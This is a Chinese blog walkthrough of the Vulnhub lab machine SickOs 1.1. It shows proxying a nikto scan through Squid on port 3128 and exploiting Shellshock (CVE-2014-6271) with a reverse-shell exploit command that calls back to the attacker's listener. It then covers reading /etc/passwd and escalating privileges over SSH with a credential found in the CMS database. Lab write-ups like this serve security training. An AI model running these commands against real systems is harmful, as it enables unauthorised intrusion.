Vulnhub靶机系列:SickOs: 1.1

这次的靶机是Vulnhub靶机:SickOs: 1.1

靶机地址及相关描述

https://www.vulnhub.com/entry/sickos-11,132/

靶机设置

老规矩了,开启前分配一个和kali同一块网卡,开始时候,一直找不到靶机,emmmm,后来才发现靶机的80没开,curl不了
Vulnhub靶机系列:SickOs: 1.1_第1张图片

利用知识及工具

nikto、nmap、错误配置、CVE-2014-6271

信息收集并getshell

之前扫描的结果,可以知道,他的http开在了3128
Vulnhub靶机系列:SickOs: 1.1_第2张图片
浏览器手动设置端口进行访问
Vulnhub靶机系列:SickOs: 1.1_第3张图片
感觉是个报错页面,别的就没啥了,老规矩,信息收集一下
发现坑比了,都是报错,搜索了下搞懂了
Vulnhub靶机系列:SickOs: 1.1_第4张图片
3128就是个代理服务的端口,所以我们可以通过这个代理端口访问内容
设置代理,vi /etc/proxychains.conf
Vulnhub靶机系列:SickOs: 1.1_第5张图片重新信息搜索,还是不行,,,希望有人指点一下
不过nikto成功了nikto -h 192.168.190.191 -useproxy 192.168.190.191:3128
Vulnhub靶机系列:SickOs: 1.1_第6张图片
这里有两个cve,搜索下信息,第二个失败
第一个搜出来很多信息,结合前面nikto判定是apache,所以先试这个
Vulnhub靶机系列:SickOs: 1.1_第7张图片
用这里的exp python exp.py payload=reverse rhost=192.168.190.191 lhost=192.168.190.177 lport=4444 proxy=192.168.190.191:3128 pages=/cgi-bin/status/
返回一个shell
Vulnhub靶机系列:SickOs: 1.1_第8张图片

提权

简单信息收集,发现权限还是很低
Vulnhub靶机系列:SickOs: 1.1_第9张图片
中间试过换成tty,但是失败了,所以找找db里面会不会有什么密码之类的,cms里找到了一个用户
Vulnhub靶机系列:SickOs: 1.1_第10张图片
查看一下本机用户cat /etc/passwd,我这个shell有个bug,显示不完全,emmm,ssh登录
Vulnhub靶机系列:SickOs: 1.1_第11张图片
成功提权

总结

proxychains那里卡了很久,貌似这个靶机walkthrough很多,有空大家可以试试

你可能感兴趣的:(Vulnhub靶机系列,安全,安全漏洞,linux)